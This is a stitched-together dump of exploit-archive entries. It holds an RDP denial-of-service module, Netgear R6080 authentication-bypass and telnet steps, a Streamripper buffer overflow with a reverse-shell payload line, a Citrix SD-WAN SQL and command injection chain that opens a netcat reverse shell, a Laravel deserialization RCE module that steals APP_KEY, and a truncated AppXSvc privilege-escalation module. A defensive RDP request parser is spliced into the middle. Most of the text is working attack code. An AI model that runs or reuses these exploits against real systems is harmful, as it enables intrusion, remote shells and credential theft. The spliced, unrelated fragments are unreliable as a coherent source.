"\x3c\x0e\xcb\xee\xa1\x9c\x54\x05\x31\x00\x31\x00\x00\x00\x01\x00" +
"\x00\x00\x25\x00\x00\x00\xc0\xcb\x08\x00\x00\x00\x01\x00\xc1\xcb" +
"\x1d\x00\x00\x00\x01\xc0\xcf\x02\x00\x08\x00\x00\x01\x40\x00\x02" +
"\x01\x01\x01\x00\x01\x40\x00\x02\x01\x01\x04"
## type = 0x13 = TS_PROTOCOL_VERSION | PDUTYPE_CONFIRMACTIVEPDU
return(rdp_build_share_control_header(0x13, pdu))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/5186005a-36f5-4f5d-8c06-968f28e2d992
## Client Synchronize - TS_SYNCHRONIZE_PDU - 2.2.1.19 / 2.2.14.1
def pdu_client_synchronize(target_user = 0)
pdu = "\x01\x00" + # messageType: 1 SYNCMSGTYPE_SYNC
[target_user].pack("S<") # targetUser, 16 bit, unsigned.
## pduType2 = 0x1f = 31 - PDUTYPE2_SYNCHRONIZE
data_header = rdp_build_share_data_header(0x1f, pdu)
## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
return(rdp_build_share_control_header(0x17, data_header))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9d1e1e21-d8b4-4bfd-9caf-4b72ee91a7135
## Control Cooperate - TC_CONTROL_PDU 2.2.1.15
def pdu_client_control_cooperate()
pdu = "\x04\x00" + # action: 4 - CTRLACTION_COOPERATE
"\x00\x00" + # grantId: 0
"\x00\x00\x00\x00" # controlId: 0
## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL
data_header = rdp_build_share_data_header(0x14, pdu)
## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
return(rdp_build_share_control_header(0x17, data_header))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4f94e123-970b-4242-8cf6-39820d8e3d35
## Control Request - TC_CONTROL_PDU 2.2.1.16
def pdu_client_control_request()
pdu = "\x01\x00" + # action: 1 - CTRLACTION_REQUEST_CONTROL
"\x00\x00" + # grantId: 0
"\x00\x00\x00\x00" # controlId: 0
## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL
data_header = rdp_build_share_data_header(0x14, pdu)
## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
return(rdp_build_share_control_header(0x17, data_header))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/ff7f06f8-0dcf-4c8d-be1f-596ae60c4396
## Client Input Event Data - TS_INPUT_PDU_DATA - 2.2.8.1.1.3.1
def pdu_client_input_event_sychronize()
pdu = "\x01\x00" + # numEvents: 1
"\x00\x00" + # pad2Octets
"\x00\x00\x00\x00" + # eventTime
"\x00\x00" + # messageType: 0 - INPUT_EVENT_SYNC
## TS_SYNC_EVENT 2.2.8.1.1.3.1.1.5
"\x00\x00" + # pad2Octets
"\x00\x00\x00\x00" # toggleFlags
## pduType2 = 0x1c = 28 - PDUTYPE2_INPUT
data_header = rdp_build_share_data_header(0x1c, pdu)
## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
return(rdp_build_share_control_header(0x17, data_header))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7067da0d-e318-4464-88e8-b11509cf0bd9
## Client Font List - TS_FONT_LIST_PDU - 2.2.1.18
def pdu_client_font_list()
pdu = "\x00\x00" + # numberFonts: 0
"\x00\x00" + # totalNumberFonts: 0
"\x03\x00" + # listFlags: 3 (FONTLIST_FIRST | FONTLIST_LAST)
"\x32\x00" # entrySize: 50
## pduType2 = 0x27 = 39 - PDUTYPE2_FONTLIST
data_header = rdp_build_share_data_header(0x27, pdu)
## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
return(rdp_build_share_control_header(0x17, data_header))
end
# ------------------------------------------------------------------------- #
def crash_test(rc4enckey, hmackey)
begin
received = ""
for i in 0..5
received += rdp_recv()
end
rescue RdpCommunicationError
# we don't care
end
vprint_status("Sending DoS payload")
found = false
for j in 0..15
## x86_payload:
rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, ["00000000020000000000000"].pack("H*")), rc4enckey, hmackey, "\x03\xef"))
## x64_payload:
rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, ["00000000000000000200000"].pack("H*")), rc4enckey, hmackey, "\x03\xef"))
end
end
def produce_dos()
unless(rdp_connection_initiation())
vprint_status("Could not connect to RDP.")
return(false)
end
vprint_status("Sending initial client data")
received = rdp_sendrecv(pdu_connect_initial(RDPConstants::PROTOCOL_RDP, datastore['RDP_CLIENT_NAME']))
rsmod, rsexp, rsran, server_rand, bitlen = rdp_parse_connect_response(received)
vprint_status("Sending erect domain request")
rdp_send(pdu_erect_domain_request())
vprint_status("Sending attach user request")
received = rdp_sendrecv(pdu_attach_user_request())
user1 = received[9, 2].unpack("n").first
[1003, 1004, 1005, 1006, 1007].each do | chan |
rdp_sendrecv(pdu_channel_request(user1, chan))
end
## 5.3.4 Client Random Value
client_rand = ''
32.times { client_rand << rand(0..255) }
rcran = bytes_to_bignum(client_rand)
vprint_status("Sending security exchange PDU")
rdp_send(pdu_security_exchange(rcran, rsexp, rsmod, bitlen))
## We aren't decrypting anything at this point. Leave the variables here
## to make it easier to understand in the future.
rc4encstart, rc4decstart, hmackey, sessblob = rdp_calculate_rc4_keys(client_rand, server_rand)
vprint_status("RC4_ENC_KEY: #{bin_to_hex(rc4encstart)}")
vprint_status("RC4_DEC_KEY: #{bin_to_hex(rc4decstart)}")
vprint_status("HMAC_KEY: #{bin_to_hex(hmackey)}")
vprint_status("SESS_BLOB: #{bin_to_hex(sessblob)}")
rc4enckey = RC4.new(rc4encstart)
vprint_status("Sending client info PDU") # TODO
pdu = pdu_client_info(datastore['RDP_USER'], datastore['RDP_DOMAIN'], datastore['RDP_CLIENT_IP'])
received = rdp_sendrecv(rdp_build_pkt(pdu, rc4enckey, hmackey, "\x03\xeb", true))
vprint_status("Received License packet")
rdp_recv()
vprint_status("Sending client confirm active PDU")
rdp_send(rdp_build_pkt(pdu_client_confirm_active(), rc4enckey, hmackey))
vprint_status("Sending client synchronize PDU")
rdp_send(rdp_build_pkt(pdu_client_synchronize(1009), rc4enckey, hmackey))
vprint_status("Sending client control cooperate PDU")
rdp_send(rdp_build_pkt(pdu_client_control_cooperate(), rc4enckey, hmackey))
vprint_status("Sending client control request control PDU")
rdp_send(rdp_build_pkt(pdu_client_control_request(), rc4enckey, hmackey))
vprint_status("Sending client input sychronize PDU")
rdp_send(rdp_build_pkt(pdu_client_input_event_sychronize(), rc4enckey, hmackey))
vprint_status("Sending client font list PDU")
rdp_send(rdp_build_pkt(pdu_client_font_list(), rc4enckey, hmackey))
vprint_status("Sending close mst120 PDU")
crash_test(rc4enckey, hmackey)
vprint_status("Sending client disconnection PDU")
rdp_send(rdp_build_data_tpdu("\x21\x80"))
return(true)
end
# ------------------------------------------------------------------------- #
def run_host(ip)
## Allow the run command to call the check command.
begin
if(open_connection())
status = produce_dos()
end
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e
bt = e.backtrace.join("\n")
vprint_error("Unexpected error: #{e.message}")
vprint_line(bt)
elog("#{e.message}\n#{bt}")
rescue RdpCommunicationError => e
vprint_error("Error communicating RDP protocol.")
status = Exploit::CheckCode::Unknown
rescue Errno::ECONNRESET => e # NLA?
vprint_error("Connection reset, possible NLA is enabled.")
rescue => e
bt = e.backtrace.join("\n")
vprint_error("Unexpected error: #{e.message}")
vprint_line(bt)
elog("#{e.message}\n#{bt}")
ensure
if(status == true)
sleep(1)
unless(open_connection())
print_good("The host is crashed!")
else
print_bad("The DoS has been sent but the host is already connected!")
end
end
disconnect()
end
end
end
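The module above negotiates `PROTOCOL_RDP` only and treats a connection reset as a sign that NLA is enabled, so a listener that sees which protocols a client offers can flag this kind of legacy-only request. The following parser for the Client X.224 Connection Request PDU (2.2.1.1) is an added example, not part of the original module; the function names, the sample source addresses and the sample requests are constructed for illustration, and the `PROTOCOL_*` values are the requestedProtocols flags from MS-RDPBCGR.

```ruby
# Added example: parse the Client X.224 Connection Request PDU and flag
# clients that offer only standard RDP security (no TLS, no CredSSP/NLA).
PROTOCOL_RDP       = 0x00000000 # standard RDP security
PROTOCOL_SSL       = 0x00000001 # TLS
PROTOCOL_HYBRID    = 0x00000002 # CredSSP (NLA)
PROTOCOL_HYBRID_EX = 0x00000008 # CredSSP with Early User Authorization
COOKIE_PREFIX      = "Cookie: mstshash=".b

class MalformedRequest < StandardError; end

# Returns a hash describing the request, or raises MalformedRequest.
def parse_x224_connection_request(raw)
  data = raw.b
  raise MalformedRequest, "shorter than TPKT + X.224 fixed header" if data.bytesize < 11
  version, _reserved, tpkt_len = data.unpack("CCn")
  raise MalformedRequest, "not TPKT version 3" unless version == 3
  raise MalformedRequest, "TPKT length does not match capture" unless tpkt_len == data.bytesize
  length_indicator, code = data.byteslice(4, 2).unpack("CC")
  raise MalformedRequest, "X.224 length indicator mismatch" unless length_indicator == tpkt_len - 5
  raise MalformedRequest, "not an X.224 Connection Request" unless (code & 0xf0) == 0xe0

  # Variable part follows dst-ref (2), src-ref (2) and class (1).
  rest = data.byteslice(11, data.bytesize)
  cookie = nil
  eol = rest.index("\r\n".b)
  if eol
    line = rest.byteslice(0, eol)
    if line.start_with?(COOKIE_PREFIX)
      cookie = line.byteslice(COOKIE_PREFIX.bytesize, eol - COOKIE_PREFIX.bytesize)
    end
    rest = rest.byteslice(eol + 2, rest.bytesize)
  end

  # RDP_NEG_REQ is optional; without it the client speaks standard RDP security.
  requested = PROTOCOL_RDP
  if rest.bytesize >= 8
    type, _flags, length, protocols = rest.unpack("CCvV")
    raise MalformedRequest, "bad RDP_NEG_REQ" unless type == 0x01 && length == 8
    requested = protocols
  elsif !rest.empty?
    raise MalformedRequest, "truncated RDP_NEG_REQ"
  end

  {
    cookie: cookie,
    requested_protocols: requested,
    offers_tls: (requested & PROTOCOL_SSL) != 0,
    offers_nla: (requested & (PROTOCOL_HYBRID | PROTOCOL_HYBRID_EX)) != 0,
    legacy_only: requested == PROTOCOL_RDP
  }
end

# Classify a list of [source, raw_bytes] records for review.
def triage(records)
  records.map do |src, raw|
    begin
      req = parse_x224_connection_request(raw)
      verdict = req[:legacy_only] ? :legacy_rdp_security_only : :ok
      { src: src, cookie: req[:cookie], verdict: verdict }
    rescue MalformedRequest => e
      { src: src, cookie: nil, verdict: :malformed, reason: e.message }
    end
  end
end

# Constructed sample input, using the field layout documented in 2.2.1.1.
def sample_request(cookie, protocols)
  body = [0xe0, 0, 0, 0].pack("CnnC") + COOKIE_PREFIX + cookie.b + "\r\n".b +
         [0x01, 0x00, 8, protocols].pack("CCvV")
  [3, 0, body.bytesize + 5].pack("CCn") + [body.bytesize].pack("C") + body
end

# Constructed: a Connection Request with no cookie and no RDP_NEG_REQ.
BARE_REQUEST = [3, 0, 11].pack("CCn") + [6].pack("C") + [0xe0, 0, 0, 0].pack("CnnC")

SAMPLES = [
  ["192.0.2.10", sample_request("alice", PROTOCOL_RDP)],
  ["192.0.2.11", sample_request("bob", PROTOCOL_SSL | PROTOCOL_HYBRID)],
  ["192.0.2.12", BARE_REQUEST],
  ["192.0.2.13", sample_request("carol", PROTOCOL_SSL)[0, 20]] # truncated capture
].freeze

if __FILE__ == $PROGRAM_NAME
  triage(SAMPLES).each { |row| puts row.inspect }
end
```

On hosts that require NLA, a `legacy_rdp_security_only` verdict marks a client that will be refused during negotiation, which makes it a low-noise signal for review.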
Android VideoPlayer ihevcd_parse_pps Out-Of-Bounds Write
Netgear WiFi Router JWNR2010v5 / R6080 Authentication Bypass
Netgear WiFi router versions JWNR2010v5 and R6080 suffer from authentication bypass vulnerabilities.
d620b4215510a859c511dd8ac8d9d84c
# Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure
# Date: 13/07/2019
# Exploit Author: Wadeek
# Hardware Version: R6080-100PES
# Firmware Version: 1.0.0.34 / 1.0.0.40
# Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx
# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip)
== Files Containing Juicy Info ==
>> http://192.168.1.1/currentsetting.htm
Firmware=V1.0.0.34WW
Model=R6080
>> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
<serialNumber>SSSSSSSNNNNNN</serialNumber>
== Security Questions Bypass > Answers Disclosure ==
>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
<POST REQUEST>
htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
(replace)
dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
(by)
dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
<POST RESPONSE>
<input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1">
<input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2">
(repeat the recovery process to get the admin password)
== Authenticated Telnet Command Execution ==
>> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug
:~$ telnet 192.168.1.1
R6080 login: admin
Password: Str0nG-!P4ssW0rD
{
upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
}
Streamripper 2.6 Buffer Overflow
Streamripper version 2.6 Song Pattern buffer overflow exploit.
dd24c19a7001e0ae2db79741d79b9334
#!/usr/bin/python
#Exploit Title: StreamRipper32 Buffer Overflow
#Date: 07/2019
#Exploit Author: Andrey Stoykov (OSCP)
#Tested On: Win7 SP1 x64
#Software Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe
#Version: 2.6
#Steps To Reproduce: Double click on "Add" in the "Station/Song Section" and paste the output in "Song Pattern"
file = open('exploit.txt', 'wb')
#msfpayload windows/shell_reverse_tcp LHOST=192.168.56.6 EXITFUNC=thread LPORT=4444 R | msfencode -e x86/alpha_mixed -b "\x00\x0a\x0d\xb4\xb8\xbc\xbd\xbe" -f c
shellcode = ""  # encoded payload bytes omitted
#74302E3F comctl32.DLL
buffer = "A"*256 + "\x3f\x2e\x30\x74" + "\x90"*10 + shellcode + "C"*(260-256-4-10)
file.write(buffer)
file.close()
Citrix SD-WAN Appliance 10.2.2 Authentication Bypass / Remote Command Execution
Citrix SD-WAN Appliance version 10.2.2 suffers from authentication bypass and remote command execution vulnerabilities.
1c552352db4cb01f5841843a21926509
# Exploit Title: Citrix SD-WAN Appliance 10.2.2 Auth Bypass and Remote Command Execution
# Date: 2019-07-12
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: https://www.citrix.com
# Product: Citrix SD-WAN
# Software Link: https://www.citrix.com/downloads/citrix-sd-wan/
# Version: Tested against 10.2.2
# Tested on:
# - Vendor-provided .OVA file
# CVE: CVE-2019-12989, CVE-2019-12991
#
# See Also:
# https://www.tenable.com/security/research/tra-2019-32
# https://medium.com/tenable-techblog/an-exploit-chain-against-citrix-sd-wan-709db08fb4ac
# https://support.citrix.com/article/CTX251987
#
# This code exploits both CVE-2019-12989 and CVE-2019-12991
# You'll need your own Netcat listener
import requests, urllib
import sys, os, argparse
import random
from OpenSSL import crypto
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

TIMEOUT = 10 # sec

def err_and_exit(msg):
    print '\n\nERROR: ' + msg + '\n\n'
    sys.exit(1)

# CVE-2019-12989
# auth bypass via file write
def do_sql_injection(base_url):
    url = base_url + '/sdwan/nitro/v1/config/get_package_file?action=file_download'
    headers = { 'SSL_CLIENT_VERIFY' : 'SUCCESS' }
    token = random.randint(10000, 99999)
    json = {
        "get_package_file": {
            "site_name" : "blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_" + str(token) + "';#",
            "appliance_type" : "primary",
            "package_type" : "active"
        }
    }

    try:
        r = requests.post(url, headers=headers, json=json, verify=False, timeout=TIMEOUT)
    except requests.exceptions.ReadTimeout:
        return None

    # error is expected
    expected = {"status":"fail","message":"Invalid value specified for site_name or appliance_type"}
    if (r.status_code == 400 and r.json() == expected):
        return token
    else:
        return None

# CVE-2019-12991
# spawns a reverse shell
def do_cmd_injection(base_url, token, ncip, ncport):
    cmd = 'sudo nc -nv %s %d -e /bin/bash' % (ncip, ncport) #
    url = base_url + '/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % (token, cmd)
    success = False
    try:
        r = requests.get(url, verify=False, timeout=TIMEOUT)
    except requests.exceptions.ReadTimeout:
        success = True
        # a timeout is success. it means we should have a shell
    return success

##### MAIN #####
desc = 'Citrix SD-WAN Appliance Auth Bypass and Remote Command Execution'
arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Citrix SD-WAN IP Address (Required)')
arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP')
arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)')
args = arg_parser.parse_args()

print "Starting... be patient. This takes a sec."

# Path to target app
base_url = 'https://' + args.t

# do sql injection to get a swc-token for auth bypass
token = do_sql_injection(base_url)
if (token is None):
    err_and_exit('SQL injection failed.')
print 'SQL injection successful! Your swc-token is ' + str(token) + '.'

# if this worked, do the command injection
# create a new admin user and spawn a reverse shell
success = do_cmd_injection(base_url, token, args.ncip, args.ncport)
if success is False:
    err_and_exit('Not so sure command injection worked. Expected a timeout.')
print 'Seems like command injection succeeded.'
print 'Check for your shell!\n'
print 'To add an admin web user, run this command: perl /home/talariuser/bin/user_management.pl addUser eviladmin evilpassword 1'
Microsoft Windows HTTP To SMB NTLM Reflection Privilege Escalation
PHP Laravel Framework Token Unserialize Remote Command Execution
This Metasploit module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x up to 5.6.29. Remote command execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php. Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY. Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix. In some cases the APP_KEY is leaked which allows for discovery and exploitation.
7094c48d642dbb2c66067663c6ef39d9
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'PHP Laravel Framework token Unserialize Remote Command Execution',
'Description' => %q{
This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29.
Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to
an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php.
Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY.
Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix.
In some cases the APP_KEY is leaked which allows for discovery and exploitation.
},
'DisclosureDate' => '2018-08-07',
'Author' =>
[
'Ståle Pettersen', # Discovery
'aushack', # msf exploit + other leak
],
'References' =>
[
['CVE', '2018-15133'],
['CVE', '2017-16894'],
['URL', 'https://github.com/kozmic/laravel-poc-CVE-2018-15133'],
['URL', 'https://laravel.com/docs/5.6/upgrade#upgrade-5.6.30'],
['URL', 'https://github.com/laravel/framework/pull/25121/commits/d84cf988ed5d4661a4bf1fdcb08f5073835083a0']
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultTarget' => 0,
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },
'Payload' => { 'DisableNops' => true },
'Targets' => [[ 'Automatic', {} ]],
))
register_options([
OptString.new('TARGETURI', [ true, 'Path to target webapp', '/']),
OptString.new('APP_KEY', [ false, 'The base64 encoded APP_KEY string from the .env file', ''])
])
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET'
})
# Can be 'XSRF-TOKEN', 'X-XSRF-TOKEN', 'laravel_session', or $appname_session... and maybe more?
unless res && res.headers && res.headers.to_s =~ /XSRF-TOKEN|laravel_session/i
return CheckCode::Unknown
end
auth_token = check_appkey
if auth_token.blank? || test_appkey(auth_token) == false
vprint_error 'Unable to continue: the set datastore APP_KEY value or information leak is invalid.'
return CheckCode::Detected
end
random_string = Rex::Text.rand_text_alphanumeric(12)
1.upto(4) do |method|
vuln = generate_token("echo #{random_string}", auth_token, method)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'headers' => {
'X-XSRF-TOKEN' => "#{vuln}",
}
})
if res && res.body.include?(random_string)
return CheckCode::Vulnerable
# Not conclusive but witnessed in the wild
elsif res && res.body.include?('Method Not Allowed')
return CheckCode::Safe
end
end
CheckCode::Detected
rescue Rex::ConnectionError
CheckCode::Unknown
end
def env_leak
key = ''
vprint_status 'Checking for CVE-2017-16894 .env information leak'
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '.env'),
'method' => 'GET'
})
# Good but may be other software. Can also check for 'APP_NAME=Laravel' etc
return key unless res && res.body.include?('APP_KEY') && res.body =~ /APP_KEY\=base64:(.*)/
key = $1
if key
vprint_good "APP_KEY Found via CVE-2017-16894 .env information leak: #{key}"
return key
end
vprint_status 'Website .env file exists but didn\'t find a suitable APP_KEY'
key
end
def framework_leak(decrypt_ex = true)
key = ''
if decrypt_ex
# Possible config error / 0day found by aushack during pentest
# Seen in the wild with recent releases
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'headers' => {
'X-XSRF-TOKEN' => Rex::Text.rand_text_alpha(1) # May trigger
}
})
return key unless res && res.body.include?('DecryptException') && res.body.include?('APP_KEY')
else
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST'
})
return key unless res && res.body.include?('MethodNotAllowedHttpException') && res.body.include?('APP_KEY')
end
# Good sign but might be more universal with e.g. 'vendor/laravel/framework' ?
# Leaks all environment config including passwords for databases, AWS, REDIS, SMTP etc... but only the APP_KEY appears to use base64
if res.body =~ /\>base64:(.*)\<\/span\>/
key = $1
vprint_good "APP_KEY Found via Laravel Framework error information leak: #{key}"
end
key
end
def check_appkey
key = datastore['APP_KEY'].present? ? datastore['APP_KEY'] : ''
return key unless key.empty?
vprint_status 'APP_KEY not set. Will try to find it...'
key = env_leak
key = framework_leak if key.empty?
key = framework_leak(false) if key.empty?
key.empty? ? false : key
end
def test_appkey(value)
value = Rex::Text.decode_base64(value)
return true if value && value.length.to_i == 32
false
end
def generate_token(cmd, key, method)
# Ported phpggc Laravel RCE php objects :)
case method
when 1
payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:15:"Faker\Generator":1:{s:13:"' + "\x00" + '*' + "\x00" + 'formatters";a:1:{s:8:"dispatch";s:6:"system";}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
when 2
payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:28:"Illuminate\Events\Dispatcher":1:{s:12:"' + "\x00" + '*' + "\x00" + 'listeners";a:1:{s:' + cmd.length.to_s + ':"' + cmd + '";a:1:{i:0;s:6:"system";}}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
when 3
payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:39:"Illuminate\Notifications\ChannelManager":3:{s:6:"' + "\x00" + '*' + "\x00" + 'app";s:' + cmd.length.to_s + ':"' + cmd + '";s:17:"' + "\x00" + '*' + "\x00" + 'defaultChannel";s:1:"x";s:17:"' + "\x00" + '*' + "\x00" + 'customCreators";a:1:{s:1:"x";s:6:"system";}}}'
when 4
payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:31:"Illuminate\Validation\Validator":1:{s:10:"extensions";a:1:{s:0:"";s:6:"system";}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
end
cipher = OpenSSL::Cipher.new('AES-256-CBC') # Or AES-128-CBC - untested
cipher.encrypt
cipher.key = Rex::Text.decode_base64(key)
iv = cipher.random_iv
value = cipher.update(payload_decoded) + cipher.final
pload = Rex::Text.encode_base64(value)
iv = Rex::Text.encode_base64(iv)
mac = OpenSSL::HMAC.hexdigest('SHA256', Rex::Text.decode_base64(key), iv+pload)
iv = iv.gsub('/', '\\/') # Escape slash
pload = pload.gsub('/', '\\/') # Escape slash
json_value = %Q({"iv":"#{iv}","value":"#{pload}","mac":"#{mac}"})
json_out = Rex::Text.encode_base64(json_value)
json_out
end
def exploit
auth_token = check_appkey
if auth_token.blank? || test_appkey(auth_token) == false
vprint_error 'Unable to continue: the set datastore APP_KEY value or information leak is invalid.'
return
end
1.upto(4) do |method|
sploit = generate_token(payload.encoded, auth_token, method)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'headers' => {
'X-XSRF-TOKEN' => sploit,
}
}, 5)
# Stop when one of the deserialization attacks works
break if session_created?
if res && res.body =~ /The MAC is invalid|Method Not Allowed/ # Not conclusive
print_status 'Target appears to be patched or otherwise immune'
end
end
end
end
AppXSvc Hard Link Privilege Escalation
There exists a privilege escalation vulnerability for Windows 10 builds prior to build 17763. Due to the AppXSvc's improper handling of hard links, a user can gain full privileges over a SYSTEM-owned file. The user can then utilize the new file to execute code as SYSTEM. This Metasploit module employs a technique using the Diagnostics Hub Standard Collector Service (DiagHub) which was discovered by James Forshaw to load and execute a DLL as SYSTEM.
c94395650cca2e92c0d550946f0e7a22
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Exploit::EXE
include Post::File
include Post::Windows::Priv
include Post::Windows::FileInfo
include Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'AppXSvc Hard Link Privilege Escalation',
'Description' => %q(
There exists a privilege escalation vulnerability for
Windows 10 builds prior to build 17763. Due to the AppXSvc's
improper handling of hard links, a user can gain full
privileges over a SYSTEM-owned file. The user can then utilize
the new file to execute code as SYSTEM.
This module employs a technique using the Diagnostics Hub Standard
Collector Service (DiagHub) which was discovered by James Forshaw to
load and execute a DLL as SYSTEM.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Nabeel Ahmed', # Vulnerability discovery and PoC
'James Forshaw', # Code creating hard links and communicating with DiagHub service
'Shelby Pace' # Metasploit module
],
'References' =>
[
[ 'CVE', '2019-0841' ],
[ 'URL', 'https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/' ],
[ 'URL', 'https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html' ],
[ 'URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html' ],
[ 'URL', 'https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html' ]
],
'Targets' =>
[
[ 'Windows 10', { 'Platform' => 'win' } ]
],
'DisclosureDate' => '2019-04-09',
'DefaultTarget' => 0
))
end
def check
return CheckCode::Unknown if sysinfo['OS'] !~ /windows\s10/i
path = expand_path('%WINDIR%\\system32\\win32k.sys')
major, minor, build, revision, brand = file_version(path)
return CheckCode::Appears if build < 17763
CheckCode::Detected
end
def upload_file(file_name, file_path)
contents = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-0841', file_name))
write_file(file_path, contents)
register_file_for_cleanup(file_path)
rescue
fail_with(Failure::UnexpectedReply, 'Failed to write file contents to target')
end
def init_process
print_status("Attempting to launch Microsoft Edge minimized.")
cmd_exec("cmd.exe /c start /min microsoft-edge:", nil, 30)
end
def mk_hard_link(src, target, link_exe)
out = cmd_exec("cmd.exe /c #{link_exe} \"#{src}\" \"#{target}\"")
return (out && out.include?('Done'))
end
def write_payload
print_status('Writing the payload to disk')
code = generate_payload_dll
@original_data = read_file(@rtf_path)
write_file(@rtf_path, code)
end
def exploit
vuln_status = check
fail_with(Failure::NotVulnerable, 'Failed to detect Windows 10') if vuln_status == CheckCode::Unknown
fail_with(Failure::None, 'Already running with SYSTEM privileges') if is_system?
cmd_exec("taskkill /F /IM MicrosoftEdge.exe /FI \"STATUS eq RUNNING\"")
dat_path = expand_path("%USERPROFILE%\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\Settings.dat")
fail_with(Failure::NotFound, 'Path does not exist') unless exist?(dat_path)
if session.arch == ARCH_X86
exe_name = 'CVE-2019-0841_x86.exe'
f_name = 'diaghub_load_x86.exe'
elsif session.arch == ARCH_X64
